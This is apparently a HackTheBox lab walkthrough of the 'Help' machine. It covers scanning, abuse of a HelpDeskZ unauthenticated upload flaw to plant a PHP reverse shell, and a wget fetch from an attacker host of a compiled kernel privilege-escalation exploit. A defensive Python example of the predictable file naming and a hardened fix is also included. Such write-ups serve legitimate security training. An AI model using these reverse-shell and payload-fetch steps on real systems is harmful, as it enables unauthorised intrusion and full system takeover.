HTB Help — Walkthrough

So let's start enumeration with an nmap scan.

root@ArmourInfosec:/ nmap -sV
Nmap scan report for (
Host is up (0.22s latency).
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
3000/tcp open http Node.js Express framework
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let's visit port 80 and see what's going on there.

Just the Apache default index page, nothing else.

Let's try gobuster with a small wordlist.

root@ArmourInfosec:/ gobuster -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Gobuster v2.0.1 OJ Reeves (@TheColonial)
[+] Mode : dir
[+] Url/Domain :
[+] Threads : 40
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
2019/05/01 08:45:18 Starting gobuster
/support (Status: 301)
/javascript (Status: 301)
2019/05/01 08:45:50 Finished

When we visit /support, we find the "HelpDeskZ :: Support Ticket System".

OK, so let's search for any known exploits for it.

root@ArmourInfosec:/ searchsploit helpdeskz

The arbitrary file upload looks interesting because it's unauthenticated.

Let's try to exploit it.

According to the exploit, when we submit a ticket with a .php attachment (or one of the other blocked extensions) the application shows "File is not allowed", but the file is still uploaded and saved to a special location under "" with a hashed name, and the exploit can give us the link. So let's try it: I'm going to upload a PHP reverse shell as "1.php" (remember to change the IP and port in the shell file if you are also using a reverse shell), visit the ticket submission page, fill in all the fields, select the shell file and click upload. It shows "File is not allowed".

Then we run the exploit:

root@ArmourInfosec:/ python 1.php
root@ArmourInfosec:/ nc -lvp 4444
$ cd /home/help
$ cat user.txt

We got the user flag. For root, first let's get a TTY shell; for that I follow the usual Linux privilege escalation notes, so a simple command:

$ python -c 'import pty;pty.spawn("/bin/bash")'

We got the TTY shell.

Now let's gather some information about the machine, like the kernel version:

help@help:/$ uname -a

So its kernel version is 4.4.0-116; let's find some exploits for it.

root@ArmourInfosec:/ searchsploit linux 4.4.0-116

Here is a Local Privilege Escalation exploit.

Let's transfer it to the victim machine; I'll serve it from a simple web server on the attacker machine.

On the attacker machine:

root@ArmourInfosec:/ python -m SimpleHTTPServer 80

On the victim machine:

help@help:/$ cd /tmp
help@help:/$ wget http://<Attacker_IP>/44298.c
help@help:/$ gcc 44298.c
help@help:/$ ./a.out

As soon as you run it you get a root shell.

help@help:/$ cd /root
help@help:/$ cat root.txt

And you've got root!

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

What is the HelpDeskZ exploit doing?

The system saves the rejected file to the tickets directory under a special name: it takes the current time, converts it to a string, appends it to the filename and takes the MD5 hash of the result, then saves the file under that hash. The script simply recomputes this for the likely upload times and gives us the exact link, the one for which the response is "200 FOUND".
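To make the weakness concrete, here is an added example (my own code, not HelpDeskZ's and not the exploit script) that reproduces the naming scheme described above next to a hardened alternative, plus an auditor's check that tells whether a stored name could have been derived from the original filename and the upload time. The function names, the 300-second window and the choice to keep the original extension in the weak variant are my assumptions.

```python
import hashlib
import secrets
import time

# Constructed example: the predictable naming scheme described in the walkthrough
# (MD5 of filename + Unix timestamp as a string), shown beside a hardened version.
# Function names are mine, not HelpDeskZ's.


def weak_upload_name(original_name: str, ts: int) -> str:
    """Stored name derived only from the original filename and the upload time
    in seconds. Anyone who knows the filename and roughly when it was uploaded
    can recompute it, so the name carries no secret."""
    ext = original_name.rsplit(".", 1)[-1]          # assumption: extension kept
    digest = hashlib.md5((original_name + str(ts)).encode()).hexdigest()
    return f"{digest}.{ext}"


def safe_upload_name(original_name: str) -> str:
    """Hardened alternative: a random name from the OS CSPRNG, and the
    user-supplied extension is not reused. A rejected upload should not be
    stored at all; if one is, a fixed non-executable extension is used."""
    return secrets.token_hex(16) + ".bin"


def is_predictable_name(stored_name: str, original_name: str,
                        upload_ts: int, window: int = 300) -> bool:
    """Auditor's check: does the stored name equal md5(original + t) for some
    t within `window` seconds of the recorded upload time? True means the
    'File is not allowed' message was not an effective control, because the
    stored file is still reachable by anyone who can compute its name."""
    stem = stored_name.rsplit(".", 1)[0]
    for t in range(upload_ts - window, upload_ts + window + 1):
        if hashlib.md5((original_name + str(t)).encode()).hexdigest() == stem:
            return True
    return False


if __name__ == "__main__":
    now = int(time.time())
    weak = weak_upload_name("1.php", now)
    safe = safe_upload_name("1.php")
    print("weak :", weak, "predictable:", is_predictable_name(weak, "1.php", now))
    print("safe :", safe, "predictable:", is_predictable_name(safe, "1.php", now))
```

The check in is_predictable_name is the same computation the walkthrough's exploit performs, run locally against a stored filename instead of over HTTP; it is the test a reviewer would run after a fix to confirm the new names really are unpredictable. The real mitigation is the one the hardened function hints at: never write a rejected upload to a web-reachable directory, and derive stored names from a random source rather than from attacker-known inputs.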

Vaibhav Joshi, Security Researcher | OSCP
